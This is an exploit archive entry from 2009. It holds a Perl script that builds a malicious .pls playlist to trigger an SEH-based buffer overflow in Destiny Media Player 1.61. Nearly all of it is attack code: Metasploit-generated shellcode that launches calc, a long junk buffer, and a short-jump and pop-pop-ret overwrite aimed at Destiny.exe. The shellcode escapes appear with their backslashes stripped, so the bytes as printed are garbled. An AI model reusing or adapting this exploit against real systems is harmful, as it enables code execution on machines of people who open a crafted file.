[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Destiny Media Player 1.61 (.pls) Universal Buffer Overflow Exploit (SEH)
# Published : 2009-08-01
# Author : ThE g0bL!N
# Previous Title : Millenium MP3 Studio 1.0 .mpf File Local Stack Overflow Exploit (update)
# Next Title : Microsoft Windows XP (win32k.sys) Local Privilege Escalation Exploit


#!/usr/bin/perl
#[+] Bug : Destiny Media Player 1.61 (.pls) Universal Buffer overflow (SEH)
#[+] Author : ThE g0bL!N
#[+] Greetz : ma 3labaliche :D
#[+] Use : open the pls file directly :)
#[+] Note: His0k4 Merci jamais Raditni
##########################################################
 
# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x38".
"x78x73x8ax83xebxfcxe2xf4xc4x90x37x8ax38x78xf8xcf".
"x04xf3x0fx8fx40x79x9cx01x77x60xf8xd5x18x79x98xc3".
"xb3x4cxf8x8bxd6x49xb3x13x94xfcxb3xfex3fxb9xb9x87".
"x39xbax98x7ex03x2cx57x8ex4dx9dxf8xd5x1cx79x98xec".
"xb3x74x38x01x67x64x72x61xb3x64xf8x8bxd3xf1x2fxae".
"x3cxbbx42x4ax5cxf3x33xbaxbdxb8x0bx86xb3x38x7fx01".
"x48x64xdex01x50x70x98x83xb3xf8xc3x8ax38x78xf8xe2".
"x04x27x42x7cx58x2exfax72xbbxb8x08xdax50x88xf9x8e".
"x67x10xebx74xb2x76x24x75xdfx1bx12xe6x5bx78x73x8a";

my $junk="x41" x 45224;
my $next_seh="xEBx06x90x90"; # short jump
my $seh="xA6x7Bx41x00"; # pop pop ret->Destiny.exe

open(myfile,'>>exploit.pls');
print myfile $top.$junk.$next_seh.$seh.$shellcode;

# www.Syue.com [2009-08-01]